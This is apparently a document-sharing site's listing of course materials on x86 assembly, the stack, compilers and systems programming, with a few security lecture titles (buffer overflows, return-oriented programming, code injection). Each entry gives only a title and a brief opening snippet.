CS642: Computer Security X86 Review Process Layout, ISA, etc. CS642: Computer Security Drew Davidson davidson@cs.wisc.edu From Last Week ACL- based permissions (UNIX style) Read, Write, execute can be restricted on users and groups

More information

15-213/18-243, Fall 2010 Exam 1 - Version A

15-213/18-243, Fall 2010 Exam 1 - Version A Andrew login ID: Full Name: Section: 15-213/18-243, Fall 2010 Exam 1 - Version A Tuesday, September 28, 2010 Instructions: Make sure that your exam is not missing any sheets, then write your Andrew login

More information

Sandboxing Untrusted Code: Software-Based Fault Isolation (SFI)

Sandboxing Untrusted Code: Software-Based Fault Isolation (SFI) Sandboxing Untrusted Code: Software-Based Fault Isolation (SFI) Brad Karp UCL Computer Science CS GZ03 / M030 9 th December 2011 Motivation: Vulnerabilities in C Seen dangers of vulnerabilities: injection

More information

Section 4: Threads and Context Switching

Section 4: Threads and Context Switching CS162 September 19-20, 2017 Contents 1 Warmup 2 1.1 Hello World............................................ 2 2 Vocabulary 2 3 Problems 3 3.1 Join................................................ 3 3.2

More information

Lecture 4 CIS 341: COMPILERS

Lecture 4 CIS 341: COMPILERS Lecture 4 CIS 341: COMPILERS CIS 341 Announcements HW2: X86lite Available on the course web pages. Due: Weds. Feb. 7 th at midnight Pair-programming project Zdancewic CIS 341: Compilers 2 X86 Schematic

More information

Separate compilation. Topic 6: Runtime Environments p.1/21. CS 526 Topic 6: Runtime Environments The linkage convention

Separate compilation. Topic 6: Runtime Environments p.1/21. CS 526 Topic 6: Runtime Environments The linkage convention Runtime Environment The Procedure Abstraction and Separate Compilation Topics we will cover The procedure abstraction and linkage conventions Runtime storage convention Non-local data access (brief) These

More information

Machine Programming 5: Buffer Overruns and Stack Exploits

Machine Programming 5: Buffer Overruns and Stack Exploits Machine Programming 5: Buffer Overruns and Stack Exploits CS61, Lecture 6 Prof. Stephen Chong September 22, 2011 Thinking about grad school in Computer Science? Panel discussion Tuesday September 27th,

More information

CS 31: Intro to Systems Functions and the Stack. Martin Gagne Swarthmore College February 23, 2016

CS 31: Intro to Systems Functions and the Stack. Martin Gagne Swarthmore College February 23, 2016 CS 31: Intro to Systems Functions and the Stack Martin Gagne Swarthmore College February 23, 2016 Reminders Late policy: you do not have to send me an email to inform me of a late submission before the

More information

The IA-32 Stack and Function Calls. CS4379/5375 Software Reverse Engineering Dr. Jaime C. Acosta

The IA-32 Stack and Function Calls. CS4379/5375 Software Reverse Engineering Dr. Jaime C. Acosta 1 The IA-32 Stack and Function Calls CS4379/5375 Software Reverse Engineering Dr. Jaime C. Acosta 2 Important Registers used with the Stack EIP: ESP: EBP: 3 Important Registers used with the Stack EIP:

More information

Lecture 07 Heap control data. Stephen Checkoway University of Illinois at Chicago

Lecture 07 Heap control data. Stephen Checkoway University of Illinois at Chicago Lecture 07 Heap control data Stephen Checkoway University of Illinois at Chicago Layout of program memory Heap is managed by malloc - Many different malloc implementations - glibc uses a modified version

More information

Buffer Overflows. A brief Introduction to the detection and prevention of buffer overflows for intermediate programmers.

Buffer Overflows. A brief Introduction to the detection and prevention of buffer overflows for intermediate programmers. Buffer Overflows A brief Introduction to the detection and prevention of buffer overflows for intermediate programmers. By: Brian Roberts What is a buffer overflow? In languages that deal with data structures

More information

System calls and assembler

System calls and assembler System calls and assembler Michal Sojka sojkam1@fel.cvut.cz ČVUT, FEL License: CC-BY-SA 4.0 System calls (repetition from lectures) A way for normal applications to invoke operating system (OS) kernel's

More information

1 Lab Overview. 2 Resources Required. CSC 666 Lab #11 Buffer Overflow November 29, 2012

1 Lab Overview. 2 Resources Required. CSC 666 Lab #11 Buffer Overflow November 29, 2012 CSC 666 Lab #11 Buffer Overflow November 29, 2012 Copyright c 2012 James Walden, Northern Kentucky University. Original document version c 2006-2012 Wenliang Du, Syracuse University. The development of

More information

Assembler Programming. Lecture 10

Assembler Programming. Lecture 10 Assembler Programming Lecture 10 Lecture 10 Mixed language programming. C and Basic to MASM Interface. Mixed language programming Combine Basic, C, Pascal with assembler. Call MASM routines from HLL program.

More information

CSC369 Lecture 2. Larry Zhang

CSC369 Lecture 2. Larry Zhang CSC369 Lecture 2 Larry Zhang 1 Announcements Lecture slides Midterm timing issue Assignment 1 will be out soon! Start early, and ask questions. We will have bonus for groups that finish early. 2 Assignment

More information

CS61C : Machine Structures

CS61C : Machine Structures inst.eecs.berkeley.edu/~cs61c/su06 CS61C : Machine Structures Lecture #9: MIPS Procedures 2006-07-11 CS 61C L09 MIPS Procedures (1) Andy Carle C functions main() { int i,j,k,m;... i = mult(j,k);... m =

More information

United States Naval Academy Electrical and Computer Engineering Department EC310-6 Week Midterm Spring 2015

United States Naval Academy Electrical and Computer Engineering Department EC310-6 Week Midterm Spring 2015 United States Naval Academy Electrical and Computer Engineering Department EC310-6 Week Midterm Spring 2015 1. Do a page check: you should have 8 pages including this cover sheet. 2. You have 50 minutes

More information

Lecture 10 Return-oriented programming. Stephen Checkoway University of Illinois at Chicago Based on slides by Bailey, Brumley, and Miller

Lecture 10 Return-oriented programming. Stephen Checkoway University of Illinois at Chicago Based on slides by Bailey, Brumley, and Miller Lecture 10 Return-oriented programming Stephen Checkoway University of Illinois at Chicago Based on slides by Bailey, Brumley, and Miller ROP Overview Idea: We forge shellcode out of existing application

More information

a) Do exercise (5th Edition Patterson & Hennessy). Note: Branches are calculated in the execution stage.

a) Do exercise (5th Edition Patterson & Hennessy). Note: Branches are calculated in the execution stage. CS3410 Spring 2015 Problem Set 2 (version 3) Due Saturday, April 25, 11:59 PM (Due date for Problem-5 is April 20, 11:59 PM) NetID: Name: 200 points total. Start early! This is a big problem set. Problem

More information

Runtime Integrity Checking for Exploit Mitigation on Embedded Devices

Runtime Integrity Checking for Exploit Mitigation on Embedded Devices Runtime Integrity Checking for Exploit Mitigation on Embedded Devices Matthias Neugschwandtner IBM Research, Zurich eug@zurich.ibm.com Collin Mulliner Northeastern University, Boston collin@mulliner.org

More information

o Code, executable, and process o Main memory vs. virtual memory

o Code, executable, and process o Main memory vs. virtual memory Goals for Today s Lecture Memory Allocation Prof. David August COS 217 Behind the scenes of running a program o Code, executable, and process o Main memory vs. virtual memory Memory layout for UNIX processes,

More information

C and C++: vulnerabilities, exploits and countermeasures

C and C++: vulnerabilities, exploits and countermeasures C and C++: vulnerabilities, exploits and countermeasures Yves Younan DistriNet, Department of Computer Science Katholieke Universiteit Leuven Belgium Yves.Younan@cs.kuleuven.ac.be Introduction C/C++ programs:

More information

Representation of Information

Representation of Information Representation of Information CS61, Lecture 2 Prof. Stephen Chong September 6, 2011 Announcements Assignment 1 released Posted on http://cs61.seas.harvard.edu/ Due one week from today, Tuesday 13 Sept

More information

EE 109 Unit 15 Subroutines and Stacks

EE 109 Unit 15 Subroutines and Stacks 1 EE 109 Unit 15 Subroutines and Stacks 2 Program Counter and GPRs (especially $sp, $ra, and $fp) REVIEW OF RELEVANT CONCEPTS 3 Review of Program Counter PC is used to fetch an instruction PC contains

More information

Malicious Code Injection via /dev/mem

Malicious Code Injection via /dev/mem Malicious Code Injection via /dev/mem Anthony Lineberry March 27, 2009 Abstract In this paper we will discuss methods for using the character device, /dev/mem, as an entry

More information

Linkers and Loaders. CS 167 VI 1 Copyright 2008 Thomas W. Doeppner. All rights reserved.

Linkers and Loaders. CS 167 VI 1 Copyright 2008 Thomas W. Doeppner. All rights reserved. Linkers and Loaders CS 167 VI 1 Copyright 2008 Thomas W. Doeppner. All rights reserved. Does Location Matter? int main(int argc, char *[ ]) { return(argc); } main: pushl %ebp ; push frame pointer movl

More information

CS , Fall 2004 Exam 1

CS , Fall 2004 Exam 1 Andrew login ID: Full Name: CS 15-213, Fall 2004 Exam 1 Tuesday October 12, 2004 Instructions: Make sure that your exam is not missing any sheets, then write your full name and Andrew login ID on the front.

More information

6 WEEK EXAM NAME: ALPHA: SECTION:

6 WEEK EXAM NAME: ALPHA: SECTION: 6 WEEK EXAM NAME: ALPHA: SECTION: 1. This is individual work. 2. SHOW ALL WORK! 3. Write legibly to receive credit. 4. Turn in your equation sheet. SCORE: /100 SCALE >89.5%: 31337 79.5 89.5%: H@XX0R 69.5

More information